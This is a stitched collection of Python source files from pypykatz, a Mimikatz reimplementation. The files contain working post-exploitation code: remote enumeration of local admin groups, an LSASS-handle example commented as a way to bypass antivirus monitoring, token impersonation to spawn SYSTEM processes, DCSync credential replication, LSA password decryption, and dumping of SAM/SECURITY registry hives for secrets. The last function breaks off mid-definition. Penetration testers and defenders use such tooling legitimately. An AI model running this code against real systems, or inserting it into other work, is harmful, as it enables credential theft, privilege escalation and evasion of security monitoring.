import json
from threading import Thread
from multiprocessing import Process, Queue
from pypykatz import logger

from pypykatz.commons.winapi.local.function_defs.netapi32 import NetLocalGroupGetMembers
from pypykatz.remote.live.common.common import is_port_up
from pypykatz.commons.common import UniversalEncoder


class LocalGroupEnumThread(Thread):
	def __init__(self, inQ, outQ, groups = ['Remote Desktop Users','Administrators','Distributed COM Users'], timeout = 1, pre_check = True):
		Thread.__init__(self)
		self.inQ = inQ
		self.outQ = outQ
		self.timeout = timeout
		self.pre_check = pre_check
		self.groups = groups
		
	def run(self):
		while True:
			target = self.inQ.get()
			if not target:
				break
			if self.pre_check is True:
				if is_port_up(target, 445, timeout = self.timeout) is False:
					continue
			try:
				for groupname in self.groups:
					for group in NetLocalGroupGetMembers(target, groupname, level=2):
						self.outQ.put((target, groupname, group))
			except Exception as e:
				logger.debug('LocalGroupEnumThread error: %s' % str(e))
				continue
		
class LocalGroupEnumProc(Process):
	def __init__(self, inQ, outQ, threadcnt, groups, timeout = 1, pre_check = True):
		Process.__init__(self)
		self.inQ = inQ
		self.outQ = outQ
		self.threadcnt = threadcnt
		self.threads = []
		self.timeout = timeout
		self.pre_check = pre_check
		self.groups = groups
		
	def run(self):
		for i in range(self.threadcnt):
			t = LocalGroupEnumThread(self.inQ, self.outQ, groups = self.groups, timeout = self.timeout, pre_check = self.pre_check)
			t.daemon = True
			t.start()
			self.threads.append(t)			
		for t in self.threads:
			t.join()
		
class LGResProc(Process):
	def __init__(self, outQ, out_file = None, to_json = False):
		Process.__init__(self)
		self.outQ = outQ
		self.results = {}
		self.out_file = out_file
		self.to_json = to_json
		
	def setup(self):
		return
	
	def run(self):
		self.setup()
		while True:
			result = self.outQ.get()
			if not result:
				break
			
			target, groupname, group = result
			
			
			if self.to_json is True:
				if target not in self.results:
					self.results[target] = []
				self.results[target].append([groupname, group.to_dict()])
			
			else:
				result = '%s %s %s %s %s' % (target, groupname, group.domain, group.username, str(group.sid))
				if self.out_file is not None:
					if target not in self.results:
						self.results[target] = []
					self.results[target].append(result)
				else:
					print(result)
		
		if self.out_file is None and self.to_json is False:
			return
		
		logger.info('Writing results...')		
		if self.out_file is not None:
			with open(self.out_file,'w', newline = '') as f:
				if self.to_json is True:
					f.write(json.dumps(self.results, cls = UniversalEncoder, indent=4, sort_keys=True))
				else:
					for target in self.results:
						for res in self.results[target]:
							f.write( '%s %s\r\n' % (target, res))
		else:
			print(json.dumps(self.results, cls = UniversalEncoder, indent=4, sort_keys=True))
			

class LocalGroupEnumerator:
	def __init__(self):
		self.hosts = []
		self.inQ = Queue()
		self.outQ = Queue()
		self.agents = []
		self.result_process = None
		
		self.agent_proccnt = 4
		self.agent_threadcnt = 4
		
		self.timeout = 1
		self.pre_check = True
		self.out_file = None
		self.to_json = False
		
		self.groups = ['Remote Desktop Users','Administrators','Distributed COM Users']
		
		
	def load_targets_ldap(self, ldap):
		ldap_filter = r'(&(sAMAccountType=805306369))'

		attributes = ['sAMAccountName']
		for entry in ldap.pagedsearch(ldap_filter, attributes):
			self.hosts.append(entry['attributes']['sAMAccountName'][:-1])
			
	def load_targets_file(self, filename):
		with open(filename,'r') as f:
			for line in f:
				line=line.strip()
				if line == '':
					continue
				self.hosts.append(line)
				
	def load_tagets(self, targets):
		self.hosts += targets
		
	def run(self):
		self.result_process = LGResProc(self.outQ, out_file = self.out_file, to_json = self.to_json)
		self.result_process.daemon = True
		self.result_process.start()
		
		for i in range(self.agent_proccnt):
			p = LocalGroupEnumProc(self.inQ, self.outQ, self.agent_threadcnt, groups = self.groups, timeout = self.timeout, pre_check = self.pre_check)
			p.daemon = True
			p.start()
			self.agents.append(p)
		
		logger.info('=== Enumerating local groups ===')
		for t in self.hosts:
			self.inQ.put(t)
		
		for a in self.agents:
			for i in range(self.agent_threadcnt):
				self.inQ.put(None)
			
		for a in self.agents:
			a.join()
		
		self.outQ.put(None)
		self.result_process.join()
		



#
# In case you happen to have a DLL that has an export which returns a handle to LSASS process
# You can use this example to load such DLL via ctypes and call pypykatz using said handle
# Might be interesting to bypass AV monitoring openprocess on LSASS
#

from ctypes import windll, c_void_p
from pypykatz.pypykatz import pypykatz

dll_path = ''

def get_lsass_handle():
	your_dll = windll.LoadLibrary(dll_path)
	_your_function = your_dll.your_function
	_your_function.argtypes = [] #I guess no args
	_your_function.restype  = c_void_p #this is basically a handle
	
	phandle = _your_function()

	return phandle


phandle = get_lsass_handle()
res = pypykatz.go_live_phandle(phandle)
print(str(res))



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import logging

def main():
	import argparse
	import glob

	from pypykatz.alsadecryptor.cmdhelper import LSACMDHelper

	
	cmdhelpers = [LSACMDHelper()]


	parser = argparse.ArgumentParser(description='Pure Python implementation of Mimikatz --and more--')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	
	subparsers = parser.add_subparsers(help = 'commands')
	subparsers.required = True
	subparsers.dest = 'command'
	
	live_group = subparsers.add_parser('live', help='Get secrets from live machine')
	live_subparsers = live_group.add_subparsers()
	live_subparsers.required = True
	live_subparsers.dest = 'module'
	
	#this is the new cmd helper formet, in beta mode currently
	for helper in cmdhelpers:
		helper.add_args(subparsers, live_subparsers)
	
	
	live_subparser_process_group = live_subparsers.add_parser('process', help='Process creating/manipulation commands')
	
	live_subparser_process_group.add_argument('cmd', choices=['create'])
	live_subparser_process_group.add_argument('-i','--interactive', action = 'store_true', help = 'Spawns a new interactive process')
	live_subparser_process_group.add_argument('--sid', help = 'Impersonate given SID in new process')
	live_subparser_process_group.add_argument('-c', '--cmdline', help = 'The process to execute. Default: cmd.exe')
	
	live_subparser_token_group = live_subparsers.add_parser('token', help='Token creating/manipulation commands')
	live_subparser_token_group.add_argument('cmd', choices=['list', 'current'])
	live_subparser_token_group.add_argument('-f','--force', action='store_true', help= 'Tries to list as many tokens as possible without SE_DEBUG privilege')
	live_subparser_users_group = live_subparsers.add_parser('users', help='User creating/manipulation commands')
	live_subparser_users_group.add_argument('cmd', choices=['list','whoami'])

	version_group = subparsers.add_parser('version', help='version')
	banner_group = subparsers.add_parser('banner', help='banner')
	logo_group = subparsers.add_parser('logo', help='logo')
	
	####### PARSING ARGUMENTS
	
	args = parser.parse_args()
	
	
	###### VERBOSITY
	if args.verbose == 0:
		logging.basicConfig(level=logging.INFO)
	elif args.verbose == 1:
		logging.basicConfig(level=logging.DEBUG)
	else:
		level = 5 - args.verbose
		logging.basicConfig(level=level)
	
	##### Common obj
	#results = {}
	#files_with_error = []
	
	for helper in cmdhelpers:
		helper.execute(args)
	
	
	###### Live 
	if args.command == 'live':				
		if args.module == 'process':
			if args.cmd == 'create':
				from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
				pm = ProcessManipulator()
				sid = 'S-1-5-18'
				if args.sid is not None:
					sid = args.sid
				
				if args.cmdline is not None:
					cmdline = args.cmdline
				else:
					#looking for the correct path...
					cmdline = os.environ['ComSpec']
				
				pm.create_process_for_sid(target_sid = sid, cmdline = cmdline, interactive = args.interactive)
				return
				
		elif args.module == 'token':
			from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
			if args.cmd == 'list':
				pm = ProcessManipulator()
				for ti in pm.list_all_tokens(args.force):
					print(str(ti))
				return
				
			if args.cmd == 'current':
				pm = ProcessManipulator()
				token_info = pm.get_current_token_info()
				print(str(token_info))
				return
				
		elif args.module == 'users':
			from pypykatz.commons.winapi.machine import LiveMachine
			
			if args.cmd == 'list':
				lm = LiveMachine()
				users = lm.list_users()
				for sid in users:
					print(str(users[sid]))
					
			elif args.cmd == 'whoami':
				lm = LiveMachine()
				user = lm.get_current_user()
				print(str(user))

	elif args.command == 'version':
		from pypykatz._version import __version__
		print(__version__)
	
	elif args.command == 'banner':
		from pypykatz._version import __banner__
		print(__banner__)
	
	elif args.command == 'logo':
		from pypykatz._version import __logo__, __logo_color__
		print(__logo_color__)
		print(__logo__)
					
	
	

if __name__ == '__main__':
	main()



import asyncio
from pypykatz import logger

async def dcsync(url, username = None):
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from aiosmb.commons.interfaces.machine import SMBMachine

	smburl = SMBConnectionFactory.from_url(url)
	connection = smburl.get_connection()

	users = []
	if username is not None:
		users.append(username)

	async with connection:
		logger.debug('[DCSYNC] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logger.debug('[DCSYNC] Connected to server!')
		logger.debug('[DCSYNC] Running...')

		i = 0
		async with SMBMachine(connection) as machine:
			async for secret, err in machine.dcsync(target_users=users):
				if err is not None:
					raise err
				i += 1
				if i % 1000 == 0:
					logger.debug('[DCSYNC] Running... %s' % i)
				await asyncio.sleep(0)
				yield secret
		
		logger.debug('[DCSYNC] Finished!')
		


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from abc import ABC, abstractmethod
from pypykatz import logger
from pypykatz.commons.common import hexdump
from pypykatz.commons.win_datatypes import RTL_AVL_TABLE

class Logger:
	def __init__(self, module_name, package_name, sysinfo):
		self.package_name = package_name
		self.module_name = module_name
		self.sysinfo = sysinfo
		self.logger = logger
		
	def get_level(self):
		return self.logger.getEffectiveLevel()
		
	def log(self, msg, loglevel = 1):
		first = True
		for line in msg.split('\n'):
			if first == True:
				self.logger.log(loglevel, '[%s] [%s] %s' % (self.package_name, self.module_name, line))
				first = False
			else:
				self.logger.log(loglevel, '[%s] [%s]    %s' % (self.package_name, self.module_name, line))

class PackageTemplate:
	def __init__(self, package_name, sysinfo = None):
		self.logger = Logger('template', package_name, sysinfo)
		self.package_name = package_name
		self.sysinfo = sysinfo
		
	def log(self, msg, loglevel = 6):
		self.logger.log(loglevel, '%s' % msg)
	
	def log_template(self, struct_var_name, struct_template_obj, loglevel = 6):
		""""
		Generic logging function to show which template was selected for which structure
		"""
		self.logger.log('Selecting template for %s: %s' % (struct_var_name, struct_template_obj.__name__), loglevel)
	
	
	@staticmethod
	@abstractmethod
	def get_template(sysinfo):
		pass
		

class PackageDecryptor:
	def __init__(self, package_name, lsa_decryptor, sysinfo, reader):
		self.logger = Logger('decryptor', package_name, sysinfo)
		self.package_name = package_name
		self.lsa_decryptor = lsa_decryptor
		self.sysinfo = sysinfo
		self.reader = reader
	
	def log(self, msg, loglevel = 6):
		self.logger.log('%s' % msg, loglevel)
		
	def find_signature(self, module_name, signature = None):
		"""
		Searches for a sequence of bytes in the module identified by module_name
		"""
		self.log('Searching for key struct signature')
		if signature is None:
			signature = self.decryptor_template.signature
		fl = self.reader.find_in_module(module_name, signature, find_first = True)
		if len(fl) == 0:
			raise Exception('Signature was not found in module %s Signature: %s' % (module_name, signature.hex()))
		return fl[0]
		
	def log_ptr(self, ptr, name, datasize = None):
		"""
		Reads datasize bytes from the memory region pointed by the pointer.
		ptr = the pointer to be read
		name = display name for the memory structure, usually the data structure's name the pointer is pointing at
		"""
		level = self.logger.get_level()
		if level > 6 or level == 0:
			return
			
		if not datasize:
			if level == 5:
				datasize = 0x10
			if level == 4:
				datasize = 0x20
			if level == 3:
				datasize = 0x50
			if level == 2:
				datasize = 0x100
			if level == 1:
				datasize = 0x200			
			
		pos = self.reader.tell()
		try:
			self.reader.move(ptr)
			data = self.reader.peek(datasize)
			self.reader.move(pos)
			self.log('%s: %s\n%s' % (name, hex(ptr), hexdump(data, start = ptr)))
		except Exception as e:
			self.log('%s: Logging failed for position %s' % (name, hex(ptr)))
		
	def decrypt_password(self, enc_password, bytes_expected = False, trim_zeroes = True):
		"""
		Common decryption method for LSA encrypted passwords. Result be string or hex encoded bytes (for machine accounts).
		Also supports bad data, as orphaned credentials may contain actual password OR garbage
		
		enc_password: bytes The encrypted password bytes
		bytes_expected: bool :indication that the result of decryption is bytes, no need for encoding
		trim_zeroes: bool: if a text is expected then this variable tells wether we should trim the trailing zeroes after decryption
		"""
		
		dec_password = None
		temp = self.lsa_decryptor.decrypt(enc_password)
		if temp and len(temp) > 0:
			if bytes_expected == False:
				try: # normal password
					dec_password = temp.decode('utf-16-le')
				except: # machine password
					try:
						dec_password = temp.decode('utf-8')
					except:
						try:
							dec_password = temp.decode('ascii')
						except:
							dec_password = temp.hex()
				else: # if not machine password, then check if we should trim it
					if trim_zeroes == True:
						dec_password = dec_password.rstrip('\x00')
			else:
				dec_password = temp
		
		return dec_password, temp
		
	def walk_avl(self, node_ptr, result_ptr_list):
		"""
		Walks the AVL tree, extracts all OrderedPointer values and returns them in a list
		node_ptr: POINTER : the Parent->RightChild pointer in the AVL tree
		result_ptr_list: list: the list to store the results in
		"""
		node = node_ptr.read(self.reader, override_finaltype = RTL_AVL_TABLE)
		if node is None:
			self.log('AVL walker found empty tree')
			return
		if node.OrderedPointer.value != 0:
			result_ptr_list.append(node.OrderedPointer.value)
			if node.BalancedRoot.LeftChild.value != 0 :
				self.walk_avl(node.BalancedRoot.LeftChild, result_ptr_list)
			if node.BalancedRoot.RightChild.value != 0 :
				self.walk_avl(node.BalancedRoot.RightChild, result_ptr_list)
		
	def walk_list(self, entry_ptr, callback, max_walk = 255, override_ptr = None):
		"""
		Iterating over a linked list. Linked lists in packages are circural, so the end of the list is tested is the Flink is pointing to an address already seen.
		
		entry_ptr = pointer type object the will yiled the first entry when called read()
		callback = function that will be called when a new entry is found. callback method will be invoked with one parameter, the entry itself
		
		max_walk = limit the amount of entries to be iterating
		override_ptr = if this parameter is set the pointer will be resolved as if it would be pointing to this structure
		"""
		
		#if entry_ptr.value == 0:
		#	self.log('walk_list called with a NULL pointer! This could mean that parsing is failing, double check this!')
		#	return
		
		entries_seen = {}
		entries_seen[entry_ptr.location] = 1
		max_walk = max_walk
		self.log_ptr(entry_ptr.value, 'List entry -%s-' % entry_ptr.finaltype.__name__ if not override_ptr else override_ptr.__name__)
		while True:
			if override_ptr:
				entry = entry_ptr.read(self.reader, override_ptr)
			else:
				entry = entry_ptr.read(self.reader)

			if not entry:
				break
				
			callback(entry)


			
			max_walk -= 1
			self.log('%s next ptr: %x' % (entry.Flink.finaltype.__name__ if not override_ptr else override_ptr.__name__ , entry.Flink.value))
			self.log('%s seen: %s' % (entry.Flink.finaltype.__name__ if not override_ptr else override_ptr.__name__ , entry.Flink.value not in entries_seen))
			self.log('%s max_walk: %d' % (entry.Flink.finaltype.__name__ if not override_ptr else override_ptr.__name__ , max_walk))
			if entry.Flink.value != 0 and entry.Flink.value not in entries_seen and max_walk != 0:
				entries_seen[entry.Flink.value] = 1
				self.log_ptr(entry.Flink.value, 'Next list entry -%s-' % entry.Flink.finaltype.__name__ if not override_ptr else override_ptr.__name__)
				entry_ptr = entry.Flink
			else:
				break
				
				
	


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#


from pypykatz.commons.common import WindowsMinBuild, KatzSystemArchitecture, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import LUID, GUID, POINTER, FILETIME, ULONG
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class DpapiTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Dpapi')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		
	@staticmethod
	def get_template(sysinfo):
		template = DpapiTemplate()
		template.list_entry = PKIWI_MASTERKEY_CACHE_ENTRY
		template.log_template('list_entry', template.list_entry)
		
		if sysinfo.architecture == KatzSystemArchitecture.X64:	
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x4d\x3b\xee\x49\x8b\xfd\x0f\x85'
				template.first_entry_offset = -4
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.signature = b'\x49\x3b\xef\x48\x8b\xfd\x0f\x84'
				template.first_entry_offset = -4
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x33\xc0\xeb\x20\x48\x8d\x05'
				template.first_entry_offset = 7
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x4c\x89\x1f\x48\x89\x47\x08\x49\x39\x43\x08\x0f\x85'
				template.first_entry_offset = -4

			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x08\x48\x39\x48\x08\x0f\x85'
				template.first_entry_offset = -10

			elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
				template.signature = b'\x48\x89\x4e\x08\x48\x39\x48\x08'
				template.first_entry_offset = -7
				
			elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1607.value:
				template.signature = b'\x48\x89\x4f\x08\x48\x89\x78\x08'
				template.first_entry_offset = 11
			
			else:
				#currently this doesnt make sense, but keeping it here for future use
				raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x33\xc0\x40\xa3'
				template.first_entry_offset = -4
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x8b\xf0\x81\xfe\xcc\x06\x00\x00\x0f\x84'
				template.first_entry_offset = -16
				
			elif sysinfo.buildnumber >= WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x33\xc0\x40\xa3'
				template.first_entry_offset = -4
			
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)

			
		return template	
	

class PKIWI_MASTERKEY_CACHE_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MASTERKEY_CACHE_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MASTERKEY_CACHE_ENTRY
		return p

		
class KIWI_MASTERKEY_CACHE_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.LogonId = None
		self.KeyUid = None
		self.insertTime = None
		self.keySize = None
		self.key = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MASTERKEY_CACHE_ENTRY()
		res.Flink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)
		res.Blink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)
		res.LogonId = await LUID.loadvalue(reader)
		res.KeyUid = await GUID.loadvalue(reader)
		res.insertTime = await FILETIME.load(reader)
		res.keySize = await ULONG.loadvalue(reader)
		if res.keySize < 512:
			res.key = await reader.read(res.keySize)
		else:
			res.key = None
		return res



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import json
from aiowinreg.hive import AIOWinRegHive

from pypykatz.registry import logger
from pypykatz.commons.common import UniversalEncoder
from pypykatz.registry.sam.sam import *
from pypykatz.registry.security.security import *
from pypykatz.registry.system.system import *
from pypykatz.registry.software.software import *


class OffineRegistry:
	"""
	This class represents an offline registry
	You will need to set at least the SYSTEM hive (to get bootkey)
	In case you have the SAM and/or SECURITY hives, it will parse them for the stored credentials/secrets as well.
	"""
	def __init__(self):		
		self.sam_hive = None
		self.security_hive = None
		self.system_hive = None
		self.software_hive = None
		
		self.system = None
		self.sam = None
		self.security = None
		self.software = None
		
	def get_secrets(self):
		self.system = SYSTEM(self.system_hive)
		bootkey = self.system.get_bootkey()
		
		if self.sam_hive:
			self.sam = SAM(self.sam_hive, bootkey)
			self.sam.get_secrets()
			
		if self.security_hive:
			self.security = SECURITY(self.security_hive, bootkey, self.system)
			self.security.get_secrets()
			
		if self.software_hive:
			self.software = SOFTWARE(self.software_hive, bootkey)
			self.software.get_default_logon()
			
		self.cleanup()
		
	def cleanup(self):
		for hive in [self.system_hive, self.security_hive, self.sam_hive]:
			try:
				hive.close()
			except:
				pass
		
	def to_file(self, file_path, json_format = False):
		with open(file_path, 'a', newline = '') as f:
			if json_format == False:
				f.write(str(self))
			else:
				f.write(self.to_json())
	
	def to_json(self):
		return json.dumps(self.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True)
			
	def to_dict(self):
		t = {}
		t['SYSTEM'] = self.system.to_dict()
		if self.sam:
			t['SAM'] = self.sam.to_dict()
		if self.security:
			t['SECURITY'] = self.security.to_dict()
		if self.software:
			t['SOFTWARE'] = self.software.to_dict()
		return t
		
		
	def __str__(self):
		t = str(self.system)
		if self.sam:
			t += str(self.sam)
		if self.security:
			t += str(self.security)
		if self.software:
			t += str(self.software)
		return t

	@staticmethod
	def from_bytes(system_data, sam_data = None, security_data = None, software_data = None):
		system_buff = io.BytesIO(system_data)
		sam_buff = None
		security_buff = None
		software_buff = None

		if sam_data:
			sam_buff  = io.BytesIO(sam_data)
		if security_data:
			security_buff = io.BytesIO(security_data)
		if software_data:
			software_buff = io.BytesIO(software_data)

		return OffineRegistry.from_buffer(system_buff, sam_buff = sam_buff, security_buff = security_buff, software_buff = software_buff)

	@staticmethod
	def from_buffer(system_buff, sam_buff = None, security_buff = None, software_buff = None):
		return OffineRegistry.from_files(system_buff, sam_path = sam_buff, security_path = security_buff, software_path = software_buff, notfile = True)
		
	@staticmethod
	def from_files(system_path, sam_path = None, security_path = None, software_path = None, notfile = False):
		po = OffineRegistry()
		
		try:
			if notfile == True:
				sys_hive = system_path
			else:
				sys_hive = open(system_path, 'rb')
			po.system_hive = AIOWinRegHive(sys_hive)
		except Exception as e:
			logger.error('Failed to open SYSTEM hive! Reason: %s' % str(e))
			raise e
		
		if sam_path:
			try:
				if notfile == True:
					sam_hive = sam_path
				else:
					sam_hive = open(sam_path, 'rb')

				po.sam_hive = AIOWinRegHive(sam_hive)
			except Exception as e:
				logger.error('Failed to open SAM hive! Reason: %s' % str(e))
				raise e
				
		else:
			logger.warning('SAM hive path not supplied! Parsing SAM will not work')
			
		if security_path:
			try:
				if notfile == True:
					sec_hive = security_path
				else:
					sec_hive = open(security_path, 'rb')				
				po.security_hive = AIOWinRegHive(sec_hive)
			except Exception as e:
				logger.error('Failed to open SECURITY hive! Reason: %s' % str(e))
				raise e
				
		else:
			logger.warning('SECURITY hive path not supplied! Parsing SECURITY will not work')
			
		if software_path:
			try:
				if notfile == True:
					sof_hive = software_path
				else:
					sof_hive = open(software_path, 'rb')
				
				po.software_hive = AIOWinRegHive(sof_hive)
			except Exception as e:
				logger.error('Failed to open SECURITY hive! Reason: %s' % str(e))
				raise e
				
		else:
			logger.warning('SOFTWARE hive path not supplied! Parsing SOFTWARE will not work')
		
		
		po.get_secrets()
		try:
			sec_hive.close()
		except:
			pass
		try:
			sam_hive.close()
		except:
			pass
		try:
			sys_hive.close()
		except:
			pass
		try:
			sof_hive.close()
		except:
			pass
		
		return po
	
	@staticmethod
	def from_live_system():
		logger.debug('Obtaining registry from local system')
		try:
			from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
			from pypykatz.commons.winapi.constants import SE_BACKUP
			import winreg
			import tempfile
			import os
			import ntpath
		except Exception as e:
			logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
			raise
			
		sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		
		locations = [
			('SAM', sam_name),
			('SYSTEM', system_name),
			('SECURITY', security_name),
		]
		
		logger.debug('Obtaining SE_BACKUP privilege...')
		try:
			po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
				logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
			else:
				logger.debug('Dumping %s OK!' % reg_name)
				dumped_names[reg_name] = location
		###
		### Do Parsing here!
		###
		po = None
		if 'SYSTEM' in dumped_names:
			try:
				po = OffineRegistry.from_files(system_name, sam_name if 'SAM' in dumped_names else None, security_name if 'SECURITY' in dumped_names else None)
			except Exception as e:
				import traceback
				traceback.print_exc()
		else:
			logger.error('Failed to dump SYSTEM hive, exiting...')
			
		logger.debug('Cleaning up temp files')
		for reg_name, location in locations:
			try:
				os.remove(location)
			except Exception as e:
				logger.error('Failed to clean up temp file for %s! Sensitive files might have been left on the filesystem! Path: %s Reason: %s' % (reg_name, location, str(e)))
			else:
				logger.debug('Cleanup for %s OK!' % reg_name)
	
		return po
	
if __name__ == '__main__':
	po = OffineRegistry.from_live_system()
	print(str(po))


import ctypes
import enum

from pypykatz.commons.readers.local.common.kernel32 import *
from pypykatz.commons.readers.local.common.psapi import *
from pypykatz.commons.readers.local.common.version import *

class WindowsMinBuild(enum.Enum):
	WIN_XP = 2500
	WIN_2K3 = 3000
	WIN_VISTA = 5000
	WIN_7 = 7000
	WIN_8 = 8000
	WIN_BLUE = 9400
	WIN_10 = 9800

	
#utter microsoft bullshit commencing..
def getWindowsBuild():

	version = GetVersionExA()
	return version.dwBuildNumber

	#class OSVersionInfo(ctypes.Structure):
	#	_fields_ = [
	#		("dwOSVersionInfoSize" , ctypes.c_int),
	#		("dwMajorVersion"      , ctypes.c_int),
	#		("dwMinorVersion"      , ctypes.c_int),
	#		("dwBuildNumber"       , ctypes.c_int),
	#		("dwPlatformId"        , ctypes.c_int),
	#		("szCSDVersion"        , ctypes.c_char*128)];
	#GetVersionEx = getattr( ctypes.windll.kernel32 , "GetVersionExA")
	#version  = OSVersionInfo()
	#version.dwOSVersionInfoSize = ctypes.sizeof(OSVersionInfo)
	#GetVersionEx( ctypes.byref(version) )    
	#return version.dwBuildNumber
	
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000

SYNCHRONIZE = 0x00100000

STANDARD_RIGHTS_REQUIRED = DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER
STANDARD_RIGHTS_ALL = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE

if getWindowsBuild() >= WindowsMinBuild.WIN_VISTA.value:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF
else:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF
	

def QueryDosDevice(drive_letter):
	buffer_length = 1024
	buf = ctypes.create_unicode_buffer(buffer_length)
	status = windll.kernel32.QueryDosDeviceW(drive_letter, buf, buffer_length)
	if status == 0:
		raise ctypes.WinError()
	return buf.value


def get_drives():
	drives = []
	bitmask = windll.kernel32.GetLogicalDrives()
	for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
		if bitmask & 1:
			drives.append(letter + ':')
		bitmask >>= 1
	return drives

def get_device_prefixes():
	device_prefixes = {}
	drives = get_drives()
	for drive in drives:
		device_prefixes[QueryDosDevice(drive)] = drive
	return device_prefixes

DEVICE_PREFIXES = get_device_prefixes()

WINDOWS_BUILD_NUMBER = getWindowsBuild()
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_VM_READ = 0x0010
MAXIMUM_ALLOWED = 33554432
STATUS_INFO_LENGTH_MISMATCH = -1073741820
MAX_PATH_UNICODE = 1 << 15

# Get full normalized image path of a process using NtQuerySystemInformation
# It doesn't need any special privileges
def get_process_full_imagename(pid):
	_NtQuerySystemInformation = windll.ntdll.NtQuerySystemInformation
	image_filename = ''
	buf = ctypes.create_unicode_buffer(0x1000)
	process_info = SYSTEM_PROCESS_ID_INFORMATION()
	process_info.ProcessId = ctypes.c_void_p(pid)
	process_info.ImageName.MaximumLength = len(buf)
	process_info.ImageName.Buffer = addressof(buf)
	status = _NtQuerySystemInformation(
		SystemProcessIdInformation,
		process_info,
		sizeof(process_info),
		None)
	if status == STATUS_INFO_LENGTH_MISMATCH:
		buf = ctypes.create_unicode_buffer(MAX_PATH_UNICODE)
		process_info.ImageName.MaximumLength = len(buf)
		process_info.ImageName.Buffer = addressof(buf)
		status = _NtQuerySystemInformation(
			SystemProcessIdInformation,
			process_info,
			sizeof(process_info),
			None)
	if status == 0:
		image_filename = str(process_info.ImageName.Buffer)
		if image_filename.startswith('\\Device\\'):
			for win_path in DEVICE_PREFIXES:
				if image_filename.startswith(win_path):
					image_filename = DEVICE_PREFIXES[win_path] + image_filename[len(win_path):]
	else:
		image_filename = 'N/A'
	return image_filename

PS_PROTECTED_TYPE_STRINGS = [None,"Light","Full"]
PS_PROTECTED_SIGNER_STRINGS = [
	None, "Authenticode", "CodeGen", "Antimalware", "Lsa", 
	"Windows", "WinTcb", "WinSystem", "StoreApp"]
PS_PROTECTED_TYPE_OLD_OS_STRINGS = [None,"System protected process"]

#https://msdn.microsoft.com/en-us/library/windows/desktop/ms683217(v=vs.85).aspx
#def enum_process_names():
#	pid_to_fullname = {}
#	
#	for pid in EnumProcesses():
#		if pid == 0:
#			continue
#
#		pid_to_fullname[pid] = get_process_full_imagename(pid)
#	return pid_to_fullname

def enum_process_names():
	pid_to_name = {}
	
	for pid in EnumProcesses():
		if pid == 0:
			continue
		pid_to_name[pid] = 'Not found'
		try:
			process_handle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
		except Exception as e:
			continue
			
		pid_to_name[pid] = QueryFullProcessImageNameW(process_handle)
	return pid_to_name

def get_process_extended_basic_information(pid,process_handle=None):
